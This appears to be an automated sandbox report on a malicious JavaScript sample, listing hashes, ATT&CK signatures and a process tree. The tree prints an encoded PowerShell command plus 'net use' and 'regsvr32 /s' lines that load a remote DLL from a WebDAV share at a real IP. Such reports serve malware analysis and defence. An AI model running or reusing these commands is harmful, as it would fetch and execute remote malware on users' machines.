Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 10:46
Static task
static1
Behavioral task
behavioral1
Sample
7858290454868466.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
7858290454868466.js
Resource
win10v2004-20241007-en
General
-
Target
7858290454868466.js
-
Size
657KB
-
MD5
be15ae9aeaea57daad4f5add8f34e761
-
SHA1
2bb89396ca958fd150739deda653efa0a649dd87
-
SHA256
e4a50bc6e27700e1db6abebd5ed70c30d50494afa15fffad3c7501d59c9f652d
-
SHA512
e6de08b3b30e9a9d87bc210e87aa4ed37954770332f134d9fa35a496202596642acf3d4c5667605b6eaf941306f800c5622c9475c4aa60d4af22b1fad421dc29
-
SSDEEP
6144:gTJeZYu1ddZ+Yih114+NAn1XlIcsnQw/KvZJ6+j/mQEyJ6+j/mb03pX5:PKPNArAfi1
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation wscript.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4716 powershell.exe 4716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4716 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.exepowershell.exedescription pid process target process PID 4968 wrote to memory of 4716 4968 wscript.exe powershell.exe PID 4968 wrote to memory of 4716 4968 wscript.exe powershell.exe PID 4716 wrote to memory of 3616 4716 powershell.exe net.exe PID 4716 wrote to memory of 3616 4716 powershell.exe net.exe PID 4716 wrote to memory of 1360 4716 powershell.exe regsvr32.exe PID 4716 wrote to memory of 1360 4716 powershell.exe regsvr32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7858290454868466.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADcANAAxADQAMwAwADIAMwA5ADkAMAA5ADQALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\94.159.113.79@8888\davwwwroot\3⤵PID:3616
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\94.159.113.79@8888\davwwwroot\17414302399094.dll3⤵PID:1360
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82